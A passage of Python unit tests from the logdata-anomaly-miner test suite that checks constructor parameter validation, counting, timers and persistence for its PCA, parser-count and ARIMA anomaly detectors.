0.9, 3, constraint_list=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=123.3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=[]) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, constraint_list=None) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=100) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=100) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list="") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=True) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=123) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=123.22) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=()) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=set()) PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/ParserCountTest.py000066400000000000000000000345111500476301700272660ustar00rootroot00000000000000from aminer.analysis.ParserCount import ParserCount, current_processed_lines_str, total_processed_lines_str from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext, DummyFirstMatchModelElement, DummySequenceModelElement import time class ParserCountTest(TestBase): """Unittests for the ParserCount.""" def test1receive_atom(self): """Test if the receive_atom method counts all paths properly.""" match_context_m1 = DummyMatchContext(b"First string") match_context_m2 = DummyMatchContext(b" to match.") match_context_m3 = DummyMatchContext(b"some completely other string to match.") match_context_seq = DummyMatchContext(b"First string to match.") fixed_dme_m1 = DummyFixedDataModelElement("m1", b"First string") fixed_dme_m2 = DummyFixedDataModelElement("m2", b" to match.") seq = DummySequenceModelElement("seq", [fixed_dme_m1, fixed_dme_m2]) fixed_dme_m3 = DummyFixedDataModelElement("m3", b"some completely other string to match.") match_element_m1 = fixed_dme_m1.get_match_element("fixed", match_context_m1) match_element_m2 = fixed_dme_m2.get_match_element("fixed", match_context_m2) match_element_m3 = fixed_dme_m3.get_match_element("fixed", match_context_m3) match_element_seq = seq.get_match_element("fixed", match_context_seq) # no path in the match_dictionary matches parser_count = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2"], [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(fixed_dme_m3.data, ParserMatch(match_element_m3), t, parser_count) old_count_dict = dict(parser_count.count_dict) parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) # single path matching parser_count = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2", "fixed/m3"], [self.stream_printer_event_handler]) old_count_dict = dict(parser_count.count_dict) old_count_dict["fixed/m3"][current_processed_lines_str] = 1 old_count_dict["fixed/m3"][total_processed_lines_str] = 1 parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) # multiple paths matching parser_count = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2", "fixed/m3"], [self.stream_printer_event_handler]) log_atom = LogAtom(match_element_seq.match_string, ParserMatch(match_element_seq), t, parser_count) old_count_dict = dict(parser_count.count_dict) old_count_dict["fixed/seq"][current_processed_lines_str] = 1 old_count_dict["fixed/seq"][total_processed_lines_str] = 1 old_count_dict["fixed/seq/m1"][current_processed_lines_str] = 1 old_count_dict["fixed/seq/m1"][total_processed_lines_str] = 1 old_count_dict["fixed/seq/m2"][current_processed_lines_str] = 1 old_count_dict["fixed/seq/m2"][total_processed_lines_str] = 1 parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) # multiple paths matching without having target_paths specified parser_count = ParserCount(self.aminer_config, None, [self.stream_printer_event_handler]) t = time.time() log_atom = LogAtom(match_element_seq.match_string, ParserMatch(match_element_seq), t, parser_count) old_count_dict = dict(parser_count.count_dict) old_count_dict["fixed/seq"] = {current_processed_lines_str: 1, total_processed_lines_str: 1} parser_count.receive_atom(log_atom) self.assertEqual(parser_count.count_dict, old_count_dict) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" parser_count = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2"], [self.stream_printer_event_handler]) t = time.time() parser_count.next_report_time = t + 40 self.assertEqual(parser_count.do_timer(t + 20), 20) self.assertEqual(parser_count.do_timer(t + 40), parser_count.report_interval) self.assertEqual(parser_count.do_timer(t + 99), 1) self.assertEqual(parser_count.do_timer(t + 100), parser_count.report_interval) def test3send_report_resetting(self): """This unittest tests the functionality of resetting the counts.""" parser_count = ParserCount(self.aminer_config, ["fixed/seq", "fixed/seq/m1", "fixed/seq/m2", "fixed/m3"], [self.stream_printer_event_handler], 600) parser_count.count_dict["fixed/seq"][current_processed_lines_str] = 5 parser_count.count_dict["fixed/seq"][total_processed_lines_str] = 5 parser_count.count_dict["fixed/seq/m1"][current_processed_lines_str] = 5 parser_count.count_dict["fixed/seq/m1"][total_processed_lines_str] = 5 parser_count.count_dict["fixed/seq/m2"][current_processed_lines_str] = 5 parser_count.count_dict["fixed/seq/m2"][total_processed_lines_str] = 5 parser_count.count_dict["fixed/m3"][current_processed_lines_str] = 17 parser_count.count_dict["fixed/m3"][total_processed_lines_str] = 17 old_count_dict = dict(parser_count.count_dict) parser_count.send_report() self.assertEqual(parser_count.count_dict, old_count_dict) parser_count.send_report() old_count_dict["fixed/seq"][current_processed_lines_str] = 0 old_count_dict["fixed/seq/m1"][current_processed_lines_str] = 0 old_count_dict["fixed/seq/m2"][current_processed_lines_str] = 0 old_count_dict["fixed/m3"][current_processed_lines_str] = 0 self.assertEqual(parser_count.count_dict, old_count_dict) def test4validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], ["default"]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], None) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], "") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], b"Default") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], True) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], 123) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], 123.3) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], {"id": "Default"}) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], ()) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], set()) self.assertRaises(ValueError, ParserCount, self.aminer_config, [""], [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, 123.22, [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval="") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=None) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=b"Default") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=True) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval={"id": "Default"}) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=["Default"]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=[]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=()) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=set()) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=123.22) ParserCount(self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], report_interval=123) self.assertRaises(ValueError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=[]) self.assertRaises(ValueError, ParserCount, self.aminer_config, None, [self.stream_printer_event_handler], target_label_list=["p"]) self.assertRaises(ValueError, ParserCount, self.aminer_config, ["path1", "path2"], [self.stream_printer_event_handler], target_label_list=["p"]) self.assertRaises(ValueError, ParserCount, self.aminer_config, ["path1"], [self.stream_printer_event_handler], target_label_list=["p1", "p2"]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list="") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=b"Default") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=True) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list={"id": "Default"}) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=123) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=123.22) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=()) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=set()) ParserCount(self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], target_label_list=["p"]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag="") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=None) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=b"Default") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=123) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=123.22) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag={"id": "Default"}) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=["Default"]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=[]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=()) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=set()) ParserCount(self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], split_reports_flag=True) self.assertRaises(ValueError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, ParserCount, self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) ParserCount(self.aminer_config, ["fixed/seq"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/PathArimaDetectorTest.py000066400000000000000000001016011500476301700303540ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.PathArimaDetector import PathArimaDetector from aminer.analysis.EventTypeDetector import EventTypeDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyFirstMatchModelElement, DummyMatchContext from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD from aminer.analysis.EventCorrelationDetector import EventCorrelationDetector, set_random_seed import random class PathArimaDetectorTest(TestBase): """Unittests for the PathArimaDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new sequences. The ESD is used to detect value sequences of length 2 and uses one id path to cope with interleaving sequences, i.e., the sequences only make sense when logs that contain the same id are considered. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) pad = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, output_logline=False) self.run_pad_test(pad, etd, self.data) # target_path_list etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], target_path_list=["/model/value"]) pad = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, output_logline=False) self.run_pad_test(pad, etd, self.data) # stop_learning_time t = time.time() log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t, None) pad = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, stop_learning_time=100) self.assertTrue(pad.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(pad.receive_atom(log_atom1)) self.assertTrue(pad.learn_mode) log_atom1.atom_time = t + 101 self.assertTrue(pad.receive_atom(log_atom1)) self.assertFalse(pad.learn_mode) # stop_learning_no_anomaly_time pad = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(pad.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(pad.receive_atom(log_atom1)) self.assertTrue(pad.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(pad.receive_atom(log_atom2)) self.assertTrue(pad.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(pad.receive_atom(log_atom3)) self.assertTrue(pad.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(pad.receive_atom(log_atom1)) self.assertFalse(pad.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) pad = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd) t = time.time() pad.next_persist_time = t + 400 self.assertEqual(pad.do_timer(t + 200), 200) self.assertEqual(pad.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(pad.do_timer(t + 999), 1) self.assertEqual(pad.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3persistence(self): """Test the do_persist and load_persistence_data methods.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler]) pad = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True, output_logline=False) self.run_pad_test(pad, etd, self.data) pad.do_persist() with open(pad.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[[], null], [[], null], [[]]]') self.assertEqual(pad.target_path_index_list, [[], None]) self.assertEqual(pad.period_length_list, [[], None]) self.assertEqual(pad.prediction_history, [[]]) pad.target_path_index_list = [] pad.period_length_list = [] pad.prediction_history = [] pad.load_persistence_data() self.assertEqual(pad.target_path_index_list, [[], None]) self.assertEqual(pad.period_length_list, [[], None]) self.assertEqual(pad.prediction_history, [[]]) other = PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertEqual(other.target_path_index_list, pad.target_path_index_list) self.assertEqual(other.period_length_list, pad.period_length_list) self.assertEqual(other.prediction_history, pad.prediction_history) def test4validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" etd = EventTypeDetector(self.aminer_config, [self.stream_printer_event_handler], save_values=False) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd) etd.save_values = True old_val = etd.min_num_vals etd.min_num_vals = 10 self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd) etd.min_num_vals = old_val old_val = etd.max_num_vals etd.max_num_vals = 10 self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd) etd.max_num_vals = old_val self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, ["default"], etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, None, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, "", etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, b"Default", etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, True, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, 123, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, 123.3, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, {"id": "Default"}, etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, (), etd) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, set(), etd) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=None) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, persistence_id="Default") self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[""]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list="") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=123.3) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=[]) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, target_path_list=None) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=None) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=b"True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline="True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, output_logline=True) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=b"True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode="True") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=123.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=[]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=()) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=set()) PathArimaDetector(self.aminer_config, [self.stream_printer_event_handler], etd, learn_mode=True) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=-1) self.assertRaises(ValueError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=0) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=100.22) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=b"Default") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init="123") self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init={"id": "Default"}) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=["Default"]) self.assertRaises(TypeError, PathArimaDetector, self.aminer_config, [self.stream_printer_event_handler], etd, num_init=[]) 